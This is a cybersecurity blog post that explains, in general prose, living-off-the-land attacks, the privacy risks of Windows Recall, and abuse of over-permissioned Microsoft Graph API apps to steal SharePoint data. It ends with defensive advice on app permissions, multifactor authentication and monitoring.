Beware of the Cloud Rustlers- Keeping Your Data Crop Safe

Welcome back to my weekly cyber security blog and I hope you all had a wonderful week. If there’s one thing that we all know, it’s that change takes time. The speed of technology change, especially with the rapid developments in AI can be difficult to keep up with, but taking new technology, and either changing personally or integrating it with business processes takes time. It was not that long ago that most businesses had a server room (or cupboard). When I first started in IT, I thought the server room was the coolest thing ever, and to this day, I’m impressed when I see neatly organised colour coded rack cable management (you know what I mean). However, business as they say waits for no one. To meet changing business needs, we implement new technology and cloud services before our governance and processes have completely caught up. IT professionals who work with on-premises technology will be familiar with over permissioned applications, when the vendor says “oh, just give it admin permissions and it will work” or provide documentation saying everything on the server needs high level permissions to work. Dare I say it, for poorly written software, this is sometimes required, even if it does provide an avenue for hackers to find a way in and steal our data. However, now we have cloud technology so that’s not a problem anymore, right… Unfortunately my friends, to use another cliché, old habits die hard. Not only do we have cloud applications with issues, for example, sometimes not implementing authentication correctly, not implement multifactor authentication at all (or charging extra for it!) or not implementing encryption correctly, we still have excessive permissions. It is a selling point for new cloud applications that they can integrate with our existing major cloud platforms like Microsoft 365 or Salesforce, however I am seeing more cases where the permissions they require in those platforms are excessive, and potentially leave the door open for threat actors to use them in unintended ways. So, this week, we explore how attackers can rain on our day from our own cloud.

From stone walls to firewalls

Since the 1990’s, we have had antivirus software installed to protect our computers, and our traditional antivirus always needed daily updates to ensure it could recognise the latest threats. However, that traditional approach does not work anymore. First, there are just too many malicious programs now, information assembled by Stationx reveals there are over 1.2 billion known malicious programs and scripts. In 2023, threat actors deployed over 200,000 more per day, or about 1.5 per minute. In recent years, viruses (malware) are not our only threat. The attacker’s problem with malware is it can get detected by our security systems. A better way for threat actors to get our stuff (especially from cloud systems like Azure, AWS and Salesforce) is to use our own tools against us. We call this Living off the Land (LOTL).

Essentially, an LOTL attack works by abusing the legitimate tools and services on a system. These are attractive for bad guys to abuse as they’re already there, and as they’re a legitimate part of the system, they won’t be detected by antivirus software. On Windows there are over 130 legitimate Microsoft programs (listed here) that can be abused. From the certificate management utility that can download files from the internet, the Control Panel can run malicious files, and the Task Scheduler used by attackers to regain access after every reboot.

I know what you did last summer

Since ChatGPT burst into our lives, the development of AI has accelerated exponentially. Recently Microsoft announced a new feature in their upcoming Copilot+ PCs, which are laptops featuring dedicated AI hardware (a Neural Processing Unit or NPU) called Windows Recall. This will allow the user to search back over everything they’ve done on their computer in the last 3 months, every document, every program, every website. We can look for that thing we did that we can’t quite remember. I can see how this would be useful along with the potential security risk. Recall will work by taking a screenshot of the PC every 5 seconds which onboard AI will analyse and make searchable. Microsoft have said that a key safeguard of this is that it will be encrypted and only stored locally. However, Recall will not redact text, meaning any passwords or confidential data on screen will be recorded and be searchable. Unfortunately, I believe this will open a whole new avenue for threat actors to live off the land. With recall, all hackers need to do is compromise an individual’s credentials and they have access to their Recall and all that person’s historical activity.

Oh no, not my cloud

The glue that holds cloud environments together is called the Application Programming Interface or API. These are the background services which move data in and out of the cloud, and for this post I am going to focus on Microsoft Graph API. Everyone who uses Microsoft 365 or Azure is using the Graph API in the background every day. It interacts with and sends data to/from every service running in the Microsoft cloud.  As the entire Microsoft ecosystem is linked together by the Graph API, even the most advanced security platforms expect to see it being used. So, if an attacker is abusing it, it is very difficult to detect what they’re doing.

Here is a great technical example where Daniel Chronlund demonstrates how common API permissions can be abused to steal data from SharePoint Online.  He uses standard application permissions to find and download the content of all a company’s SharePoint document libraries. The key points to highlight here is that he’s using legitimate permissions and services, which can be completely remote, and there’s no malware involved so, even if this was being done from your own PC, it’s still unlikely to be detected by antivirus. Earlier this year, Varonis Threat Labs outlined another attack where SharePoint access is abused to secretly steal cloud files, disguising them as file synchronisation to hide from security systems. As these attacks are against public cloud, all the threat actor needs to go is steal legitimate credentials and they can do all this remotely, from anywhere in the world.

All together now

I’ve listed some of the problems, but let’s talk what we can do to protect ourselves. Partly this comes down to basic cyber hygiene (as most things do) and part of it to careful monitoring. Living off the land attacks are hard to defend against as they use legitimate tools and services against us. We can’t block them as we need them for our systems to work, but we can monitor them.

Although traditional security tools will not help us here, AI can really give cyber defenders an edge. Modern monitoring platforms use AI to monitor both our on-premises and cloud platforms to identity legitimate tools behaving in usual ways which could indicate an active attack. For most companies, I would recommend outsourcing this to managed security services partner (MSSP) who can monitor 24x7.

Cyber hygiene is also vital, it is common for new products being integrated into our Azure cloud tenancy to either be given to many permissions, or those permissions get left behind when products are retired.

There are three hygiene rules that all companies should follow.

1. Application Administrators – Carefully control who can add apps to your Azure, this can easily get out of control, leading to lots of extra unmonitored permissions.
2. Multifactor Authentication – Make sure all your apps require multifactor authentication to access, don’t make it easy for the bad guys.
3. Secrets – Your application secrets are the same as passwords, keep them safe and locked away.

We hear so much about ransomware and other forms of malware, but cyber-attacks come in many forms. Threat actors are always looking for new ways to steal our stuff without being caught. Living off the land is an increasingly common and subtle technique which is difficult to defend against. Our best defence is a good offence. We must have the right tools in place to monitor our technology estate (cloud and on-premises) to look for programs behaving badly, and we need to think carefully about what we allow into our cloud, after all, as we’ve seen, even good programs can go rogue.

I believe in our cyber security community and that by sharing and helping each other that we can all be safer. So, everything above is just my opinion, what’s yours? Please share in the comments below and stay safe.